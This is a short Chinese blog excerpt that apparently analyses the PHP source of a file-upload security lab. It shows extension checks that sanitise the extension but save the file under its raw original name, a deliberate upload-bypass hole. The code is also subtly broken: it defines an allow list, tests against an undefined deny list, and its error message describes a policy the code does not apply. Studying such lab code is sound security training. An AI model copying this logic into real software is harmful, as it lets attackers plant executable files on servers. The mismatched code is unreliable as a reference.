源码分析
if(isset($_POST['submit'])){if(file_exists($UPLOAD_ADDR)){
$allow_ext =array(".jpg",".jpeg",".png",".bmp",".gif");
$file_name =trim($_FILES['upload_file']['name']);
$file_name =deldot($file_name);//删除文件名末尾的点
$file_ext =strrchr($file_name,'.');
$file_ext =strtolower($file_ext);//转换为小写
$file_ext =str_ireplace('::$DATA','', $file_ext);//去除字符串::$DATA
$file_ext =trim($file_ext);//收尾去空if(in_array($file_ext, $deny_ext)){if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/'. $_FILES['upload_file']['name'])){
$img_path = $UPLOAD_ADDR. $_FILES['upload_file']['name'];
$is_upload =true;}}else{
$msg ='此文件不允许上传,仅允许[.jpg, .jpeg, .png, .bmp, .gif]!';}}else{
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';}}
版权归原作者 吃_早餐 所有, 如有侵权,请联系我们删除。